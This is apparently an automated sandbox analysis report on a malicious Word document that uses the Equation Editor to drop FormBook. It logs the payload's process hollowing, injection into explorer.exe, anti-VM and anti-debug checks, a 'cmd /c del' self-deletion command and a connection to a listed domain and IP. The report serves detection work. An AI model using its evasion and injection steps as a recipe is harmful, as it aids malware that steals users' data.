Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Process created: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Process created: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe' Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$L PN210700369.doc Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE5CC.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winDOC@9/8@3/2
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: explorer.exe, 00000006.00000000.442663039.0000000002AE0000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: cmmon32.pdb source: obinnamaxdw2962.exe, 00000005.00000002.504809742.0000000000030000.00000040.00020000.sdmp
Source: Binary string: cmmon32.pdbr2v source: obinnamaxdw2962.exe, 00000005.00000002.504809742.0000000000030000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdb source: obinnamaxdw2962.exe, cmmon32.exe

Data Obfuscation:

barindex
.NET source code contains potential unpacker
Source: obinnamaxdw2962.exe.2.dr, Darwin.WindowsForm/MainForm.cs .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.obinnamaxdw2962.exe.9e0000.0.unpack, Darwin.WindowsForm/MainForm.cs .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.obinnamaxdw2962.exe.9e0000.3.unpack, Darwin.WindowsForm/MainForm.cs .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.obinnamaxdw2962.exe.9e0000.0.unpack, Darwin.WindowsForm/MainForm.cs .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 4_2_009E93F1 push dword ptr [ebx]; retf 4_2_00A89468
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 4_2_0036B1C3 push B8FFFFE6h; ret 4_2_0036B1CA
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00417B5A pushad ; iretd 5_2_00417B76
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00417B8C pushad ; iretd 5_2_00417B76
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_0041D4B5 push eax; ret 5_2_0041D508
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_0041D56C push eax; ret 5_2_0041D572
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00416503 push ebx; ret 5_2_00416512
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_0041D502 push eax; ret 5_2_0041D508
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_0041D50B push eax; ret 5_2_0041D572
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_0041763B push 00000067h; iretd 5_2_004176C7
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_004176C9 pushfd ; retf 5_2_00417785
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_009E93F1 push dword ptr [ebx]; retf 5_2_00A89468
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00AEDFA1 push ecx; ret 5_2_00AEDFB4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0213DFA1 push ecx; ret 7_2_0213DFB4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_00080001 push ss; ret 7_2_00080002
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0009D4B5 push eax; ret 7_2_0009D508
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0009D50B push eax; ret 7_2_0009D572
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_00096503 push ebx; ret 7_2_00096512
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0009D502 push eax; ret 7_2_0009D508
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0009D56C push eax; ret 7_2_0009D572
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0009763B push 00000067h; iretd 7_2_000976C7
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_000976C9 pushfd ; retf 7_2_00097785
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_00097B5A pushad ; iretd 7_2_00097B76
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_00097B8C pushad ; iretd 7_2_00097B76
Source: initial sample Static PE information: section name: .text entropy: 7.03259314681
Source: initial sample Static PE information: section name: .text entropy: 7.03259314681

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\obinnazx[1].exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xEF
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: 4.2.obinnamaxdw2962.exe.220ed1c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.426482026.00000000021D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.426552817.0000000002233000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: obinnamaxdw2962.exe PID: 2612, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: obinnamaxdw2962.exe, 00000004.00000002.426482026.00000000021D1000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: obinnamaxdw2962.exe, 00000004.00000002.426482026.00000000021D1000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe RDTSC instruction interceptor: First address: 0000000000089904 second address: 000000000008990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe RDTSC instruction interceptor: First address: 0000000000089B7E second address: 0000000000089B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2588 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe TID: 1444 Thread sleep time: -41690s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe TID: 1724 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe TID: 2520 Thread sleep time: -32000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\cmmon32.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00409AB0 rdtsc 5_2_00409AB0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Thread delayed: delay time: 41690 Jump to behavior
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 00000006.00000000.445863890.000000000449C000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000006.00000000.428251777.0000000000255000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: obinnamaxdw2962.exe, 00000004.00000002.426482026.00000000021D1000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: obinnamaxdw2962.exe, 00000004.00000002.426482026.00000000021D1000.00000004.00000001.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000006.00000000.473898771.000000000456F000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000006.00000000.445901799.00000000044E7000.00000004.00000001.sdmp Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
Source: explorer.exe, 00000006.00000000.428344606.000000000029B000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: explorer.exe, 00000006.00000000.446097272.00000000045D6000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: obinnamaxdw2962.exe, 00000004.00000002.426482026.00000000021D1000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: obinnamaxdw2962.exe, 00000004.00000002.426482026.00000000021D1000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Anti Debugging:

barindex
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00409AB0 rdtsc 5_2_00409AB0
Enables debug privileges
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00AF26F8 mov eax, dword ptr fs:[00000030h] 5_2_00AF26F8
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_021426F8 mov eax, dword ptr fs:[00000030h] 7_2_021426F8
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_0040ACF0 LdrLoadDll, 5_2_0040ACF0
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.islamic-coins.com
Source: C:\Windows\explorer.exe Network Connect: 2.57.140.50 80 Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Section unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: D00000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Memory written: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe base: 400000 value starts with: 4D5A Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Thread register set: target process: 1764 Jump to behavior
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Thread register set: target process: 1764 Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Thread register set: target process: 1764 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Process created: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe' Jump to behavior
Source: explorer.exe, 00000006.00000000.441650262.0000000000750000.00000002.00020000.sdmp, cmmon32.exe, 00000007.00000002.682606786.0000000000D10000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.428251777.0000000000255000.00000004.00000020.sdmp Binary or memory string: ProgmanG
Source: explorer.exe, 00000006.00000000.441650262.0000000000750000.00000002.00020000.sdmp, cmmon32.exe, 00000007.00000002.682606786.0000000000D10000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: explorer.exe, 00000006.00000000.441650262.0000000000750000.00000002.00020000.sdmp, cmmon32.exe, 00000007.00000002.682606786.0000000000D10000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Queries volume information: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 5.2.obinnamaxdw2962.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.505046149.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.682290111.00000000002F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.504859779.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.427647092.00000000031D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.505001814.0000000000240000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.449050958.0000000009A6D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.682028966.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.456579155.0000000009A6D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.682330562.0000000000380000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 5.2.obinnamaxdw2962.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.505046149.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.682290111.00000000002F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.504859779.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.427647092.00000000031D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.505001814.0000000000240000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.449050958.0000000009A6D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.682028966.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.456579155.0000000009A6D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.682330562.0000000000380000.00000004.00000001.sdmp, type: MEMORY
windows-stand
